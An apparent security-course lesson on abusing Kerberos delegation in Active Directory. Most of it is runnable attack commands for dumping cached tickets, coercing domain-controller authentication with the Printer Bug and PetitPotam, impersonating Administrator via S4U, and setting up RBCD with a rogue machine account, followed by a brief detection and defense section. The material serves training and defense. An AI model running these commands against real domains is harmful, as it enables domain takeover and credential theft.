Delegation Attacks | Active Directory Attacks

Kerberos Delegation allows services to impersonate users and access other services on their behalf. Sounds convenient, right? It is - until attackers abuse it. Delegation misconfigurations are among the most devastating AD weaknesses.

Think of delegation like giving a butler permission to use your credit card. Unconstrained delegation is saying "use it anywhere." Constrained delegation is "only use it at the grocery store." Both can be abused if the butler (or anyone who compromises them) is malicious.

Three Types of Delegation

Windows has three delegation types: Unconstrained (most dangerous), Constrained (still risky), and Resource-Based Constrained (newest, also exploitable). We'll cover all three.

Unconstrained Delegation

1Unconstrained Delegation:
2├── Machine can impersonate ANY user to ANY service
3├── TGT is cached in memory when user authenticates
4├── Attacker with access to machine can steal TGTs
5└── Enabled via: 606070;">#a5d6ff;">"Trust this computer for delegation to any service"
6 
7How it works:
81. User authenticates to service on Server A
92. User's TGT is sent to Server A (for delegation)
103. Server A caches TGT in memory
114. Server A can now impersonate user ANYWHERE
125. Attacker dumps cached TGTs → impersonates users
13 
14Attack scenario:
151. Compromise machine with unconstrained delegation
162. Wait for or coerce privileged user to authenticate
173. Extract their TGT from memory
184. Pass-the-Ticket as that user

Finding Unconstrained Delegation

powershell

1606070;"># PowerView
2Get-DomainComputer -Unconstrained
3 
4606070;"># AD Module
5Get-ADComputer -Filter {TrustedForDelegation -eq $True}
6Get-ADUser -Filter {TrustedForDelegation -eq $True}
7 
8606070;"># LDAP query
9(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))
10 
11606070;"># Note: DCs always have unconstrained delegation by design

Extracting Cached TGTs

1606070;"># Mimikatz - export all tickets
2privilege::debug
3sekurlsa::tickets /export
4 
5606070;"># Look for TGTs (krbtgt in service name)
6606070;"># [0;12345]-0-0-40e10000-admin@krbtgt-CORP.LOCAL.kirbi
7 
8606070;"># Rubeus
9.\Rubeus.exe dump
10 
11606070;"># Monitor for new tickets (wait for privileged user)
12.\Rubeus.exe monitor /interval:5

Coercing Authentication (Printer Bug)

bash

1606070;"># Force DC to authenticate to your compromised machine
2606070;"># Using SpoolSample (Printer Bug)
3SpoolSample.exe dc.corp.local compromised-server.corp.local
4 
5606070;"># Using Petitpotam
6python3 Petitpotam.py compromised-server dc.corp.local
7 
8606070;"># Using Coercer (multiple methods)
9python3 Coercer.py -t dc.corp.local -l compromised-server
10 
11606070;"># Now the DC's machine account TGT is in your machine's memory!
12606070;"># Extract with Mimikatz and DCSync

DC Compromise via Printer Bug

If you compromise a server with unconstrained delegation, use the Printer Bug to make the DC authenticate to you. You get the DC's machine account TGT → S4U2Self to impersonate DA → DCSync.

Constrained Delegation

1Constrained Delegation:
2├── Service can impersonate users to SPECIFIC services only
3├── Uses S4U2Proxy extension
4├── Services listed in msDS-AllowedToDelegateTo
5└── Still dangerous - can often escalate
6 
7How it works:
81. Service A configured to delegate to Service B
92. User authenticates to Service A
103. Service A requests service ticket for user to Service B
114. Service A accesses Service B as user
12 
13Attack potential:
14- If you control Service A, you can impersonate ANY user to Service B
15- Service B might be valuable (CIFS on DC, HTTP on server, etc.)

Finding Constrained Delegation

powershell

1606070;"># PowerView
2Get-DomainComputer -TrustedToAuth | Select-Object name, msds-allowedtodelegateto
3Get-DomainUser -TrustedToAuth | Select-Object name, msds-allowedtodelegateto
4 
5606070;"># AD Module
6Get-ADComputer -Filter {msDS-AllowedToDelegateTo -like 606070;">#a5d6ff;">'*'} -Properties msDS-AllowedToDelegateTo
7Get-ADUser -Filter {msDS-AllowedToDelegateTo -like 606070;">#a5d6ff;">'*'} -Properties msDS-AllowedToDelegateTo
8 
9606070;"># Look for valuable targets:
10606070;"># cifs/dc.corp.local - File shares on DC
11606070;"># http/server.corp.local - Web services
12606070;"># ldap/dc.corp.local - LDAP operations

Exploiting Constrained Delegation

bash

1606070;"># Scenario: svc_sql can delegate to cifs/dc.corp.local
2606070;"># You have svc_sql's password or hash
3 
4606070;"># Impacket - getST.py
5606070;"># Request service ticket as Administrator to CIFS on DC
6getST.py -spn cifs/dc.corp.local -impersonate Administrator corp.local/svc_sql:password
7export KRB5CCNAME=Administrator.ccache
8psexec.py -k -no-pass corp.local/Administrator@dc.corp.local
9 
10606070;"># With hash
11getST.py -spn cifs/dc.corp.local -impersonate Administrator -hashes :HASH corp.local/svc_sql
12 
13606070;"># Rubeus
14.\Rubeus.exe s4u /user:svc_sql /rc4:HASH /impersonateuser:Administrator \
15  /msdsspn:cifs/dc.corp.local /ptt

SPN Alteration

You can often modify the SPN in the ticket! If delegation is to cifs/server, try changing to ldap/server or http/server. This depends on the service validating the SPN.

Resource-Based Constrained Delegation (RBCD)

1RBCD (Resource-Based Constrained Delegation):
2├── Target service decides who can delegate TO it
3├── Configured on the TARGET, not source
4├── Uses msDS-AllowedToActOnBehalfOfOtherIdentity
5├── Can be set by anyone with write access to computer object
6└── Often exploitable via computer account creation
7 
8Key difference:
9- Traditional: 606070;">#a5d6ff;">"Service A can delegate to Service B" (set on A)
10- RBCD: 606070;">#a5d6ff;">"Service B allows delegation FROM Service A" (set on B)
11 
12Attack scenario:
131. You have write access to a computer account
142. Create new computer account (or use existing controlled)
153. Set RBCD allowing your computer to delegate to target
164. Use S4U2Self + S4U2Proxy to impersonate any user to target

RBCD Attack Prerequisites

1You need:
2├── Write access to target computer's AD object
3│   ├── GenericAll
4│   ├── GenericWrite
5│   ├── WriteProperty on specific attribute
6│   └── Owns the object
7└── A computer account you control
8    ├── Machine you've compromised
9    ├── OR create new computer (ms-DS-MachineAccountQuota)
10    └── Default: Any user can create 10 machine accounts

Exploiting RBCD

powershell

1606070;"># Step 1: Create machine account (if needed)
2606070;"># Impacket addcomputer
3addcomputer.py -computer-name 606070;">#a5d6ff;">'EVIL$' -computer-pass 'EvilPass123!' corp.local/user:password
4 
5606070;"># Or PowerMad
6Import-Module .\Powermad.ps1
7New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 606070;">#a5d6ff;">'EvilPass123!' -AsPlainText -Force)
8 
9606070;"># Step 2: Get SID of your computer
10$sid = Get-DomainComputer EVIL -Properties objectsid | Select-Object -ExpandProperty objectsid
11 
12606070;"># Step 3: Create security descriptor
13$SD = New-Object Security.AccessControl.RawSecurityDescriptor(606070;">#a5d6ff;">"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)")
14$bytes = New-Object byte[] ($SD.BinaryLength)
15$SD.GetBinaryForm($bytes, 0)
16 
17606070;"># Step 4: Set RBCD on target
18Set-DomainObject -Identity 606070;">#a5d6ff;">'TARGET$' -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$bytes}

bash

1606070;"># Step 5: Get service ticket via RBCD
2606070;"># S4U2Self (get ticket to yourself as target user)
3606070;"># S4U2Proxy (use that to get ticket to target service)
4 
5getST.py -spn cifs/target.corp.local -impersonate Administrator \
6  -dc-ip dc.corp.local corp.local/EVIL$:606070;">#a5d6ff;">'EvilPass123!'
7 
8export KRB5CCNAME=Administrator.ccache
9psexec.py -k -no-pass corp.local/Administrator@target.corp.local

Delegation Comparison

Type	Scope	Configured On	Attack Method
Unconstrained	Any service	Source	Extract cached TGTs
Constrained	Specific SPNs	Source	S4U to target SPNs
RBCD	Specific targets	Target	Set RBCD + S4U

Detection & Defense

1Detection:
2├── Unconstrained Delegation
3│   ├── Event ID 4769 - Service ticket request
4│   ├── Look for TGT forwarding patterns
5│   └── Monitor for SpoolSample/Petitpotam traffic
6├── Constrained Delegation
7│   ├── S4U2Proxy operations
8│   └── Unusual service ticket patterns
9└── RBCD
10    ├── Changes to msDS-AllowedToActOnBehalfOfOtherIdentity
11    ├── New computer account creation
12    └── Event ID 4662 - Object modification
13 
14Defense:
15├── Minimize delegation usage
16├── Use 606070;">#a5d6ff;">"Account is sensitive and cannot be delegated"
17│   └── For privileged accounts (DA, etc.)
18├── Protected Users group prevents delegation
19├── Limit who can create machine accounts
20│   └── Set ms-DS-MachineAccountQuota to 0
21├── Audit delegation settings regularly
22└── Monitor for delegation attribute changes

Protected Users

Members of the Protected Users group cannot be delegated. Add Domain Admins and other privileged accounts to this group to prevent delegation-based attacks.

Delegation Attack Methodology

Delegation Attack Flow

EnumerateFind delegation configurations

Identify TypeUnconstrained, Constrained, or RBCD potential

CompromiseGet access to delegating account/machine

ExecuteExtract TGT or perform S4U attack

ImpersonateUse obtained ticket to access target

EscalateTypically leads to DA or DC compromise

Knowledge Check

Quick Quiz

Question 1 of 3

What's the main danger of unconstrained delegation?

Challenges

Printer Bug to DCSync

Challenge

💀 advanced

Compromise a machine with unconstrained delegation, use the Printer Bug to coerce DC authentication, capture the TGT, and perform DCSync.

Need a hint? (4 available)

Key Takeaways

Unconstrained delegation caches TGTs - steal them all
Constrained delegation limits to specific SPNs
RBCD is configured on target, exploitable via write access
Printer Bug coerces DC authentication
Protected Users group prevents delegation
Set MachineAccountQuota to 0 to prevent RBCD attacks

Related Lessons

AD Authentication

Pass-the-Ticket

DCSync Attack